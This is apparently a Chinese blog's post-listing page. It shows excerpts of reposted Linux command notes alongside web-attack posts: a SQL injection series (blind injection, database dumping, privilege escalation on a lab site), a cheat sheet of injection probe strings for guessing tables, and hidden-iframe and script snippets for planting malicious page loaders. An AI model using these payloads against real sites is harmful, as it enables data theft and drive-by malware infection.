自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

  • 博客(9)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

转载 20190908-第三课(命令介绍)

1、 ps命令R 正在运行S 中断、休眠状态D 不可中断Z 僵死、僵尸进程T 停止进程2、 top命令top - 15:19:10 up 11 min, 2 users, load average: 0.08, 0.33, 0.39系统时间 已运行时间 登录终端数 系统负载情况(1分钟、5分钟、15分钟)Tasks: 287 to...

2019-09-08 22:45:00 94

转载 20190906-第一课(虚拟机以及linux系统安装)

安装配置虚拟机  VMware WorkStation虚拟机软件是一款桌面计算机虚拟软件,让用户能够在单一主机上同时运行多个不同的操作系统。每个虚拟操作系统的硬盘分区、数据配置都是独立的,而且多台虚拟机可以构建为一个局域网。Linux系统对硬件设备的要求很低,我们没有必要再买一台电脑,课程实验用虚拟机完全可以搞定,而且VM还支持实时快照、虚拟网络、拖曳文件以及PXE(Preboot ...

2019-09-07 22:19:00 197

转载 20190907-第二课(命令介绍)

1、鲁大师、驱动精灵   查看PC终端配置2、RPM 含义3、systemctl: systemctl start 服务名称 运行服务 ststemctl restart 服务名称 重启服务 systemctl stop 服务名称 停止服务 systemctl enable 服务名称 加入到启动项 ...

2019-09-07 21:33:00 315

转载 WEB 安全之 SQL注入 < 三 > 提权

前两篇文章介绍了攻击者通过构造SQL语句来获得“非授权信息”,都是停留在数据库层面的,其实它的威力可不仅仅止于此吆。如果DB管理员有疏忽,再加上页面有注入漏洞,危害不仅仅像前两篇最终网站后台沦陷搞不好整个系统都有可能被人控制。    测试环境跟上一篇相同, MSQL + asp.net + win7。前面已经拿下了管理员用户名、密码,我们还是使用新闻详细页面 ( 方便测试,不设防 ...

2019-06-19 22:59:00 179

转载 WEB 安全之 SQL注入 < 二 > 暴库

接着上篇,还是新闻发布系统,上篇演示的盲注,其实还有更简单的办法。上篇是从新闻详细页面入侵成功,在下面的测试中入侵者发现新闻列表页面也存在相同的漏洞,呵呵呵,貌似从这里入侵更方便些。这里测试环境跟上一篇相同, MSQL + asp.net 。新闻列表页面代码如下: protected void Page_Load(object sender, Eve...

2019-06-19 22:58:00 105

转载 WEB 安全之 SQL注入<一> 盲注

SQL注入原理 主要是攻击者,利用被攻击页面的一些漏洞(通常都是程序员粗心大意造成的),改变数据库执行的SQL语句,从而达到获取“非授权信息”的目的。 下面自己搭建了实验环境用于测试。 首先交待一下,测试环境 开发语言为 Asp.net ,数据库使用的 MSQL ,测试页面模拟了普通的新闻页面,URL里接受参数 ?id=1 获取文章ID,后台直接通获取的ID拼接查...

2019-06-19 22:56:00 103

转载 Linux命令之mount挂载

挂载概念Linux中的根目录以外的文件要想被访问,需要将其“关联”到根目录下的某个目录来实现,这种关联操作就是“挂载”,这个目录就是“挂载点”,解除次关联关系的过程称之为“卸载”。注意:“挂载点”的目录需要以下几个要求:(1)目录事先存在,可以用mkdir命令新建目录;(2)挂载点目录不可被其他进程使用到;(3)挂载点下原有文件将被隐藏。挂载与卸载挂载方...

2019-01-26 17:09:00 530

转载 sql注入语句整理

1.判断有无注入点; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) ---判断是否存在admin这张表3.猜帐号数目 如果遇到0< 返回...

2019-01-10 08:33:00 73

转载 Web挂马方式整理

一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javas...

2019-01-09 12:08:00 170

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除